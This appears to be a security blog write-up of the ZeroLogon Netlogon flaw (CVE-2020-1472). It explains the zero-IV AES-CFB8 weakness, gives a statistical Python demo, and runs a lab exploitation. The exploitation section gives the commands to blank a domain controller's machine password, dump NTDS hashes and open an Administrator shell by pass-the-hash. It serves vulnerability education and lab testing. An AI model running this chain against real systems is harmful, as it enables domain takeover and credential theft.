ZeroLogon Exploit
CVE-2020-1472, 6 Oct 2020

Introduction

CVE-2020-1472 is a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) that Microsoft patched in the August 2020 security updates (KB4565349). It was publicly detailed by Secura researcher Tom Tervoort on 11 September 2020. The weak point is the use of AES in 8-bit Cipher Feedback mode (AES-CFB8) by MS-NRPC to compute the client credential from the "Client Challenge" and the session key in the third step of the authentication handshake. ZeroLogon affects every Windows server that functions as an Active Directory domain controller in an enterprise network.
The following diagram shows the MS-NRPC authentication handshake; the attack targets step 3, where the client credential is computed with AES-CFB8.
AES-CFB8 as used in MS-NRPC has a problem with its Initialisation Vector (IV). The IV should be random, but MS-NRPC hard-codes it to 16 bytes of zeros. In CFB8 each plaintext byte is XORed with the first byte of the block cipher output for the current shift register, so with a zero IV and an all-zero client challenge the first credential byte is the first byte of AES(K, 0^16). For roughly 1 in 256 session keys that byte is 0; the shift register then never changes, every later keystream byte is the same 0, and the whole 8-byte credential comes out as zeros. The attacker does not know the session key (it is derived from the machine account password), but can simply start a fresh handshake with a zero client challenge and an all-zero client credential until the server accepts it in step 4, which takes about 256 attempts on average. The attack details can be found in the whitepaper by Tom Tervoort.
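The following Python block is an added illustration of the weakness described above; it is not code from the original post or from Secura's whitepaper. It implements CFB8 over a single-block encryption function, applies it with the hard-coded zero IV the way ComputeNetlogonCredential does, and measures how often an all-zero challenge produces an all-zero credential. Real AES is used when the `cryptography` package is installed; otherwise a SHA-256 based stand-in block function is used, under the labelled assumption that only the distribution of the first output byte matters for this demonstration. The function names, the deterministic `demo_key` derivation and the key count are the example's own choices.

```python
"""
Why a fixed all-zero IV breaks AES-CFB8 in MS-NRPC (the ZeroLogon root cause).

Added illustration for this page, not code from the original post or from
Secura's whitepaper. Real AES is used when 'cryptography' is installed;
otherwise a SHA-256 stand-in block function is used (assumption: only the
statistics of the first output byte matter for what is shown here).
"""
import hashlib

BLOCK = 16  # AES block size in bytes

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Single-block AES encryption (ECB over exactly one block)."""
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(block) + enc.finalize()

    BLOCK_NAME = "AES-128"
except ImportError:
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Stand-in pseudo-random block function (assumption, see module docstring)."""
        return hashlib.sha256(key + block).digest()[:BLOCK]

    BLOCK_NAME = "SHA-256 stand-in"


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8 mode over block_encrypt, the way MS-NRPC applies AES.

    For each plaintext byte: encrypt the 16-byte shift register, XOR its first
    output byte into the plaintext byte, then shift the ciphertext byte in.
    """
    register = iv
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, register)[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential (AES variant): CFB8 with the IV fixed at 16 zero bytes.

    The fixed IV is the bug; a random IV would remove the all-zero shortcut.
    """
    if len(challenge) != 8:
        raise ValueError("Netlogon challenges and credentials are 8 bytes")
    return cfb8_encrypt(session_key, bytes(BLOCK), challenge)


def zero_credential_predicted(session_key: bytes) -> bool:
    """True iff an all-zero challenge yields an all-zero credential under this key.

    With IV = 0 and plaintext byte 0 the first ciphertext byte is
    block_encrypt(K, 0^16)[0]; if it is 0 the register stays all zeros and the
    same 0 keystream byte repeats for all 8 positions.
    """
    return block_encrypt(session_key, bytes(BLOCK))[0] == 0


def demo_key(i: int) -> bytes:
    """Deterministic 16-byte test key i (constructed; stands in for a session key)."""
    return hashlib.sha256(b"zerologon-demo-key-" + i.to_bytes(4, "big")).digest()[:BLOCK]


def consistency_holds(n_keys: int) -> bool:
    """Check that the first-byte prediction and the full CFB8 result agree for every key."""
    return all(
        zero_credential_predicted(demo_key(i))
        == (compute_netlogon_credential(demo_key(i), bytes(8)) == bytes(8))
        for i in range(n_keys)
    )


def zero_credential_fraction(n_keys: int) -> float:
    """Fraction of test keys for which the all-zero credential would be accepted.

    For a block cipher that behaves like a random permutation this is about
    1/256, so the attacker expects roughly 256 handshakes before one succeeds.
    """
    hits = sum(compute_netlogon_credential(demo_key(i), bytes(8)) == bytes(8)
               for i in range(n_keys))
    return hits / n_keys


def cross_check_with_library(key: bytes, data: bytes) -> bool:
    """Compare cfb8_encrypt with the library's own AES-CFB8 (vacuously True for the stand-in)."""
    if BLOCK_NAME != "AES-128":
        return True
    enc = Cipher(algorithms.AES(key), modes.CFB8(bytes(BLOCK)), backend=default_backend()).encryptor()
    return enc.update(data) + enc.finalize() == cfb8_encrypt(key, bytes(BLOCK), data)


if __name__ == "__main__":
    frac = zero_credential_fraction(10000)
    print(f"{BLOCK_NAME}: zero challenge -> zero credential for {frac:.5f} of keys "
          f"(1/256 = {1/256:.5f})")
    for i in range(3):
        print(demo_key(i).hex(), compute_netlogon_credential(demo_key(i), bytes(8)).hex())
```

Running the block prints the measured fraction next to 1/256 and a few sample credentials. The point to take away is that the server's step-4 check compares against a value the attacker can force to all zeros without knowing the key, purely because the IV never changes.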

Exploitation Demo

Many PoC exploits have been released; this demo uses the RiskSense one.

Target Environment

```
Host Name:     FKCLAI-WIN2016
OS Name:       Microsoft Windows Server 2016 Standard
OS Version:    10.0.14393 N/A Build 14393
Domain:        FKCLAI.local
Logon Server:  \\FKCLAI-WIN2016
```

Tools Setup

This demo uses RiskSense's ZeroLogon exploitation script together with the latest impacket built from source.
```
[email protected]:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
[email protected]:~/Documents/ctf/expoit#
```
Remove the distribution's impacket packages so they do not shadow the source build:
```
[email protected]:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
  erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
  erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
  erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
  erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
  ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
  gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
  guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
  keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
  libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
  libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
  libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
```
Get the latest impacket from https://github.com/SecureAuthCorp/impacket.git:
```
[email protected]:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.
```
```
[email protected]:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin

Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
[email protected]:~/Documents/ctf/tools/win/impacket#
```

Start Exploit

The exploit runs in three steps. set_empty_pw.py performs the ZeroLogon handshake against the DC, retrying with a zero client challenge and an all-zero client credential until the server accepts one, and then resets the domain controller's machine account password to an empty string. secretsdump.py -just-dc then authenticates with that now-empty machine account password and replicates the domain's NTDS secrets, including the Administrator NT hash. Finally wmiexec.py passes that hash to obtain a shell as Administrator on the DC. (The user@target parts of the last two commands were mangled by the page's e-mail obfuscation; the target is the same DC, 192.168.1.169.)
```
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
```
Note that emptying the DC machine account password desynchronises it from the password the DC itself holds, which breaks the DC's own services (replication, DNS and others) until it is restored. After the demo, put the original password back with reinstall_original_pw.py from the same RiskSense repository, using the machine account's original NT hash recovered in the secretsdump output.
